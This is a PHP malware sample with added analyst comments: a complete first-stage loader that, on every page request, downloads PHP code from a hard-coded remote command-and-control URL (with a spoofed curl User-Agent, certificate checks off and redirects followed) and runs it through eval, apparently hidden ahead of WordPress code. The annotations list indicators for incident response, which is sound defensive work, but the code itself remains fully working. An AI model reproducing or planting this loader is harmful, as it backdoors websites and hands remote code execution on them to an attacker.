<?php
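// Biji Acak: eae6a708  (Indonesian: "random seed". NOTE(analysis): presumably a per-copy value that changes the file hash between copies - match on content, not on a single hash; confirm against other samples.)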

// NOTE(analysis): Malicious first-stage loader. It downloads PHP source from a
// hard-coded remote URL and runs it inside the current request with eval(); the
// downloaded code itself is not part of this file.
// Indicators visible here: the URL in $c2_url, the fixed User-Agent 'curl/7.68.0',
// a Referer built from the local Host header, and eval('?>' . ...) on a cURL response.
class WorkingLoader {
    // Hard-coded download location (the author names it "c2_url"). Treat the domain and
    // path as network indicators when reviewing proxy, DNS and egress logs.
    private static $c2_url = 'https://awscloud.icu//newbro/codeseo/lyymbut3';
    
    // Entry point: fetch the remote code and, if anything came back, run it.
    // Returns false when fetchPayload() yielded nothing usable, true after the payload
    // was handed to runPayload(). It does not report whether the payload itself succeeded.
    public static function execute() {
        // Download backdoor with proper headers
        $payload = self::fetchPayload();
        
        // empty() also covers the explicit false returned on a failed download.
        if (empty($payload)) {
            return false;
        }
        
        // Clean and execute
        self::runPayload($payload);
        return true;
    }
    
    // Performs one outbound HTTPS GET to $c2_url with the PHP cURL extension.
    // Returns the response body as a string on HTTP 200 with a non-empty body,
    // otherwise false.
    private static function fetchPayload() {
        $ch = curl_init(self::$c2_url);
        
        // IMPORTANT: Mimic infected server request
        // NOTE(analysis): fixed User-Agent string; together with the Referer below it
        // gives a stable pattern to search for in outbound web-proxy logs.
        curl_setopt($ch, CURLOPT_USERAGENT, 'curl/7.68.0');
        // The Referer is built from the Host header of the incoming request, so the
        // remote server receives the host name this page was requested under.
        curl_setopt($ch, CURLOPT_REFERER, 'http://' . $_SERVER['HTTP_HOST'] . '/');
        // Return the body from curl_exec() instead of printing it.
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        // Whole transfer is limited to 10 seconds, which bounds the delay added to the page load.
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        // Peer certificate verification is switched off, so the request completes even
        // when the server's certificate cannot be validated.
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        // Redirects are followed: the host that finally serves the payload can differ
        // from the hard-coded domain, so blocking that one domain may not be sufficient.
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        
        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        
        // Only a 200 response with a non-empty body is passed on; every other outcome
        // (transport error, other status code, empty body) falls through to false.
        if ($http_code == 200 && !empty($response)) {
            return $response;
        }
        
        return false;
    }
    
    // Executes the downloaded text as PHP within the current request.
    private static function runPayload($code) {
        // METHOD 1: Remove PHP tags and eval (CORRECT WAY)
        // NOTE(analysis): despite the comment above, nothing is stripped. The '?>' prefix
        // makes eval() start outside PHP mode, so $code is processed like the contents of
        // a PHP file and its own <?php tags are honoured. Nothing is written to disk on
        // this path, so a file-system scan finds only this loader, not the second stage.
        eval('?>' . $code);
        
        // NOTE(analysis): the block below is disabled code kept by the author. If a variant
        // enables it, the payload would be staged as tmp_<md5 of time()>.php under
        // sys_get_temp_dir(), included, then deleted - short-lived .php files in the temp
        // directory are the artefact to look for.
        /* 
        // METHOD 2: Alternative - Write to temp file
        $temp = sys_get_temp_dir() . '/tmp_' . md5(time()) . '.php';
        file_put_contents($temp, $code);
        include($temp);
        @unlink($temp);
        */
    }
}

// Execute the loader
// NOTE(analysis): this call runs on every request that loads the file, and the return
// value is ignored, so a failed download is silent.
WorkingLoader::execute();

// Continue to WordPress
// NOTE(analysis): the comment above suggests the snippet sits ahead of legitimate
// WordPress code in the same file - presumably so the site keeps working; confirm by
// comparing the file with a clean copy from the matching release.
?>